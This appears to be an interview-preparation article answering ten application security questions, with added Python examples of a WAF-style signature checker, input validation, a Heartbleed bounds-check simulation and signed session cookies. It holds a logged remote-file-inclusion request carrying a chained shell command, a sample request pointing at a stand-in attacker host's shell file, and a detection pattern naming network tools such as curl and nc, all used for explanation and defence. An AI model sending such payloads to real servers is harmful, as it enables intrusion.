10 Most Common Application Security Interview Questions
Application security covers the software, hardware and procedural measures used to protect an application from external threats. It is a growing field because most applications are now reachable over a network, which increases their exposure to vulnerabilities and attacks.
If you are interviewing for a position related to application security, chances are high that you will be asked about the basic security concepts behind it.
Here we list the 10 most common application security interview questions you are likely to face.
1. What is the difference between a proxy, an IDS and an IPS?
Answer: A proxy server is a relay used for caching, monitoring and controlling traffic in a network. It caches frequently accessed data and serves the cached copy to end users to speed things up, and it can enforce rules that allow or block users from browsing a site or accessing certain data. E.g. Squid.
An IDS (Intrusion Detection System) detects attempted intrusions, generally by matching traffic against the signatures it holds (some also use anomaly detection), and raises an alert; it does not block the traffic itself. E.g. Snort.
An IPS (Intrusion Prevention System) goes beyond detection: because it sits inline, it can drop a packet or connection it considers malicious. E.g. IBM Proventia.
2. How does asymmetric encryption work?
Answer: In asymmetric encryption, different keys are used on the encrypting and decrypting sides. The sender encrypts the data with the receiver's public key, and the receiver decrypts it with the matching private key. The private key is known only to the receiver, while the public key can be distributed freely. This scales well when many end users need to send confidential data to a single party: they all need only the one public key, and no secret has to be shared in advance. In practice asymmetric encryption is slow and limited to short messages, so it is usually used to protect a symmetric session key that encrypts the bulk data (hybrid encryption).
3. In which stage of the SDLC are security controls integrated?
Answer: Security should be built into every phase of the SDLC rather than bolted on at the end: security requirements and threat modelling during requirements and design, secure coding and code review during implementation, security testing during testing, and hardened configuration, patching and monitoring during deployment and maintenance. In the implementation phase specifically, control settings are applied in compliance with the vendors' rules and the current implementation guidance.
4. Which application generated the log below? What kind of attack is being performed?
Request: 22.214.171.124 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743
POST /index.php HTTP/1.1
Content-Encoding: gzip, deflate
User-Agent: Mozilla 4.0 (Linux)
mod_security-message: Access denied with code 403. Pattern match "uname\x20a"
lid=http://site.example.com/chill.php?&cmd=cd /tmp;id;lsuname -a
Answer: The log was generated by ModSecurity, a signature-based web application firewall (the mod_security-message header and the "Access denied with code 403" text are its rule-match output). The request body passes a remote URL in the lid parameter, which points to remote file inclusion, together with a cmd parameter carrying a chained shell command ending in uname -a, so the attacker is attempting remote command execution on the web server. ModSecurity matched its uname signature and blocked the request with a 403.
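The kind of check ModSecurity performs, as an added example that is not the article's code nor ModSecurity's own rules: a small request parser pulls every parameter out of the query string and form body, and two hypothetical signatures (the rule ids are invented here) flag remote URLs in parameters and shell command chains. The sample requests are constructed, modelled on the excerpt above.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Hypothetical signatures in the spirit of ModSecurity rules; the rule ids are invented here.
RFI_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)
CMD_RE = re.compile(
    r"(?:^|[;&|`\n])\s*(?:cd|id|ls|uname|cat|wget|curl|nc|sh|bash|whoami)\b",
    re.IGNORECASE,
)


def parse_form(data):
    """Split application/x-www-form-urlencoded data on '&' only, so ';' stays inside values."""
    params = []
    for pair in data.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.append((unquote_plus(name), unquote_plus(value)))
    return params


def parse_raw_request(raw):
    """Minimal HTTP/1.x request parser: returns (method, path, headers, [(name, value), ...])."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    params = parse_form(parts.query)
    content_type = headers.get("content-type", "application/x-www-form-urlencoded")
    if body and content_type.startswith("application/x-www-form-urlencoded"):
        params += parse_form(body)
    return method, parts.path, headers, params


def inspect_request(raw):
    """Return a list of (rule_id, parameter, reason) findings; empty when nothing matched."""
    _method, _path, _headers, params = parse_raw_request(raw)
    findings = []
    for name, value in params:
        if RFI_RE.match(value):
            findings.append(("RFI-001", name, "parameter value is a remote URL"))
        if CMD_RE.search(value):
            findings.append(("CMDI-001", name, "shell command chain in parameter value"))
    return findings


def decide(raw):
    """403 if any signature fires, otherwise let the request through (200)."""
    return 403 if inspect_request(raw) else 200


# Constructed sample traffic, modelled on the log excerpt above (not a real capture).
SAMPLES = {
    "rfi_and_cmd": (
        "POST /index.php HTTP/1.1\r\nHost: site.example.com\r\n"
        "User-Agent: Mozilla 4.0 (Linux)\r\n\r\n"
        "lid=http://site.example.com/chill.php?&cmd=cd /tmp;id;ls;uname -a"
    ),
    "rfi_only": (
        "GET /index.php?lid=http://attacker.example/shell.txt HTTP/1.1\r\n"
        "Host: site.example.com\r\n\r\n"
    ),
    "benign": (
        "POST /index.php HTTP/1.1\r\nHost: site.example.com\r\n\r\n"
        "lid=42&comment=hello+world"
    ),
}
```

Signature matching of this kind is only as good as its patterns: a command spelled `u'name' -a` or encoded differently would slip past CMD_RE, which is why a real WAF normalises input and layers many rules, and why the application must still validate the parameters itself.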
5. What is the difference between authentication and authorization?
Answer: Plainly put, authentication is checking that the presented credentials are correct, i.e. that the user is who they claim to be. Authorization is checking what privileges the authenticated user has.
Authentication decides whether you are allowed into the application at all; authorization decides whether you have the privilege to perform a particular action on a particular resource. Authorization therefore comes after authentication, and passing the first does not imply the second.
6. List some important issues to consider when securing a web server and a web application.
Answer: Ways to secure a web server include:
- Adequate logging, with the logs actually reviewed
- Keeping the system up to date, with patches applied
- Removing default and sample scripts, pages and accounts
- Managing ownership and file permissions so the web server process can read and write only what it needs
Ways to secure a web application include:
- Regular testing and assessment
- Enforcing input validation (preferably allow-lists) on all untrusted input
- Displaying generic error messages to users while logging the details server-side
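The last two application items in practice, as an added example that is not from the original article: an allow-list check on a username parameter, a generic message for rejected input, and an unexpected failure turned into a generic response with a reference id while the real exception stays in the server log. The request handler, the `db_lookup` stand-in and its profile data are all constructed for the example.

```python
import logging
import re
import uuid

log = logging.getLogger("app")

# Allow-list: only characters a username may legitimately contain. Anything else is rejected
# outright rather than "cleaned", so shell metacharacters, quotes and path separators never
# reach the code that uses the value.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{3,32}$")


class ValidationError(ValueError):
    pass


def validate_username(value):
    if not isinstance(value, str) or not USERNAME_RE.match(value):
        raise ValidationError("username failed allow-list check")
    return value


def handle_profile_request(params, lookup_profile):
    """Return (status, body) for a profile request. `lookup_profile` is the data layer."""
    try:
        username = validate_username(params.get("username", ""))
        return 200, {"username": username, "profile": lookup_profile(username)}
    except ValidationError as exc:
        log.warning("rejected input: %s", exc)
        return 400, {"error": "Invalid request."}  # no hint about which rule failed
    except Exception:  # last-resort handler: the client never sees the exception text
        ref = uuid.uuid4().hex[:12]
        log.exception("ref=%s unhandled error", ref)  # stack trace and message stay in the log
        return 500, {"error": "An internal error occurred.", "ref": ref}


# Constructed stand-in for a database lookup.
PROFILES = {"alice": "Alice, admin", "bob": "Bob, user"}


def db_lookup(username):
    if username == "crash":
        raise RuntimeError("DB connection to db-primary:5432 refused")  # internal detail
    return PROFILES.get(username, "unknown user")
```

The reference id lets support staff find the full stack trace in the log from what the user reports, without the error page revealing host names, queries or library versions to an attacker probing the application.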
7. Illustrate the difference between a vulnerability and an exploit.
Answer: A vulnerability is a passive weakness; an exploit is the active use of it. Think of it this way: the lock on your front door is broken. That is the vulnerability. A burglar opening the door through the broken lock is the exploit. The chances of that happening are higher if your house is in a large city and lower if you live in a rural area, which is why risk depends on the threat environment as well as on the weakness itself.
8. Which form submission method would you implement for submitting sensitive information?
Answer: Always use POST rather than GET for sensitive data such as passwords. With GET the values go into the URL's query string, where they end up in browser history, in proxy and web server access logs and in Referer headers sent to other sites. POST carries them in the request body, keeping them out of those places. POST is not encryption, though: the body is still readable on the wire unless the form is submitted over HTTPS, so both are required.
9. Which vulnerability discovered recently allowed a remote attacker to read the contents of a machine's RAM?
Answer: Heartbleed (CVE-2014-0160), a missing bounds check in OpenSSL's implementation of the TLS heartbeat extension. A peer could send a heartbeat request that declared a larger payload than it actually contained, and a vulnerable OpenSSL copied up to 64 KB of adjacent process memory into the reply, memory that could hold private keys, session cookies and passwords. It was not specific to Linux: any system running OpenSSL 1.0.1 through 1.0.1f was affected, servers and clients alike.
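The missing check and the fix, as an added example that is not the article's code and not OpenSSL's: a simplified model of a heartbeat record on a bytearray standing in for the process heap, with a vulnerable handler that trusts the declared length next to a patched one that rejects a length the record cannot hold. The record layout follows RFC 6520; the "secret" placed after the record is constructed for the example.

```python
import struct

# Simplified model of a TLS heartbeat record (RFC 6520): type(1) | payload_length(2) | payload | padding.
# `memory` stands in for the process heap: the received record followed by whatever happened to be
# stored next to it. The real bug was the same logic applied to a heap buffer in C.
HEADER_LEN = 1 + 2
PADDING_LEN = 16


def build_heartbeat(claimed_payload_length, payload):
    """Heartbeat request whose declared length need not match the bytes actually sent."""
    return bytes([1]) + struct.pack(">H", claimed_payload_length) + payload + b"\x00" * PADDING_LEN


def vulnerable_handler(memory, record_length):
    """Trusts the peer's length field (OpenSSL 1.0.1 to 1.0.1f): may read far past the record."""
    payload_length = struct.unpack(">H", memory[1:3])[0]
    return bytes(memory[HEADER_LEN:HEADER_LEN + payload_length])


def patched_handler(memory, record_length):
    """The 1.0.1g fix: silently discard the request if the declared payload does not fit the record."""
    payload_length = struct.unpack(">H", memory[1:3])[0]
    if HEADER_LEN + payload_length + PADDING_LEN > record_length:
        return None
    return bytes(memory[HEADER_LEN:HEADER_LEN + payload_length])


def simulate(claimed_payload_length, payload=b"hi"):
    """Return (vulnerable_reply, patched_reply) for one heartbeat against a heap holding a secret."""
    secret = b"session=SECRET-TOKEN-1234; password=hunter2"  # constructed neighbouring heap data
    record = build_heartbeat(claimed_payload_length, payload)
    memory = bytearray(record + secret + b"\x00" * 64)
    return vulnerable_handler(memory, len(record)), patched_handler(memory, len(record))
```

A two-byte length field is why the leak was capped at 64 KB per request; nothing stopped an attacker from repeating the request, which is how whole private keys were recovered.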
10. How does HTTP handle state?
Answer: By itself it does not. HTTP is stateless: each request is handled independently and the server keeps no memory of earlier requests from the same client. State is layered on top by the application, most commonly with a session identifier that the server issues after login and the client returns on every subsequent request, usually in a cookie (URL parameters and hidden form fields are the more exposed alternatives). Because that identifier stands in for the user on every request, it must be unguessable, sent only over HTTPS (Secure flag), kept away from scripts (HttpOnly) and expired on logout and after inactivity.
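One way the state question and the authentication/authorization question (5) fit together in code, as an added example that is not part of the original article: `authenticate` checks a password against a salted PBKDF2 hash and issues an HMAC-signed session cookie, and `authorize` re-establishes the caller from that cookie on each request (HTTP itself remembers nothing) before comparing the role against what the action requires. The server key, user store, role ranking and cookie format are all assumptions made for the example.

```python
import base64
import hashlib
import hmac
import json
import os
import time

# Hypothetical server-side key; in production it comes from configuration or a KMS, never from code.
SERVER_KEY = os.urandom(32)
ROLE_RANK = {"user": 1, "admin": 2}
USERS = {}  # constructed in-memory user store: name -> {salt, hash, role}


def _hash_password(password, salt, iterations=100_000):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def add_user(name, password, role):
    salt = os.urandom(16)
    USERS[name] = {"salt": salt, "hash": _hash_password(password, salt), "role": role}


def make_session_cookie(claims):
    """HMAC-signed cookie: the client carries the state, the server can verify it was not altered."""
    body = base64.urlsafe_b64encode(json.dumps(claims, sort_keys=True).encode()).rstrip(b"=").decode()
    sig = hmac.new(SERVER_KEY, body.encode(), "sha256").hexdigest()
    return body + "." + sig


def read_session_cookie(cookie):
    """Return the claims if the signature verifies and the session has not expired, else None."""
    body, sep, sig = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(SERVER_KEY, body.encode(), "sha256").hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None  # tampered or forged: never decode an unverified body
    claims = json.loads(base64.urlsafe_b64decode(body + "=" * (-len(body) % 4)))
    if claims.get("exp", 0) < time.time():
        return None
    return claims


def authenticate(username, password):
    """Authentication: are the credentials correct? On success, issue a session cookie."""
    user = USERS.get(username)
    if user is None:
        return None
    if not hmac.compare_digest(_hash_password(password, user["salt"]), user["hash"]):
        return None
    return make_session_cookie({"sub": username, "role": user["role"], "exp": int(time.time()) + 3600})


def authorize(cookie, required_role):
    """Authorization: re-establish the caller from the cookie on every request (HTTP is stateless),
    then check whether that identity may perform the action. 401 = not authenticated,
    403 = authenticated but not permitted."""
    claims = read_session_cookie(cookie or "")
    if claims is None:
        return 401
    if ROLE_RANK.get(claims.get("role"), 0) < ROLE_RANK[required_role]:
        return 403
    return 200


add_user("alice", "correct horse battery staple", "admin")
add_user("bob", "hunter2", "user")
```

A signed cookie is one of two common designs; the other stores only a random session id in the cookie and keeps the claims server-side, which makes revocation immediate at the cost of a lookup per request. Either way the distinction in the code is the one the interview question is after: a bad password fails authentication (401), a valid session without the right role fails authorization (403).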
When applying for a security position, always make sure that you have properly understood the concepts of application security. The most common terms are asset, threat, vulnerability, attack and countermeasure; never lose sight of these.
If you have any queries about the application security questions listed above, or questions you are unable to answer, write to us in the comments below!